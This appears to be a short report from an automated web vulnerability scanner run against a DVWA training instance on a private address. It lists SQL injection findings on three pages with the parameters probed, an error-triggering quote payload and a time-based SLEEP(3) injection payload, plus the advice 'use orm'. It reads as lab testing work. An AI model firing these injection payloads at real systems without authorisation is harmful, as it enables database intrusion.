Target: http://192.168.42.1/dvwa/ (GET)

---
URL:http://192.168.42.1/dvwa/vulnerabilities/brute/ (GET)
VulnName: sqli
Query: {'username': 'cntvalue', 'Login': 'Login', 'password': 'cntvalue'}
Payload: d'z"0
Advice: use orm
Database: MySQL database
---
---
URL:http://192.168.42.1/dvwa/vulnerabilities/sqli/ (GET)
VulnName: sqli
Query: {'id': 'cntvalue', 'Submit': 'Submit'}
Payload: d'z"0
Advice: use orm
Database: MySQL database
---
---
URL:http://192.168.42.1/dvwa/vulnerabilities/sqli_blind/ (GET)
VulnName: time delay sqli vuln
Query: {'id': 'cntvalue', 'Submit': 'Submit'}
Payload: ' or SLEEP(3);-- 
Advice: use orm
Database: unknown
---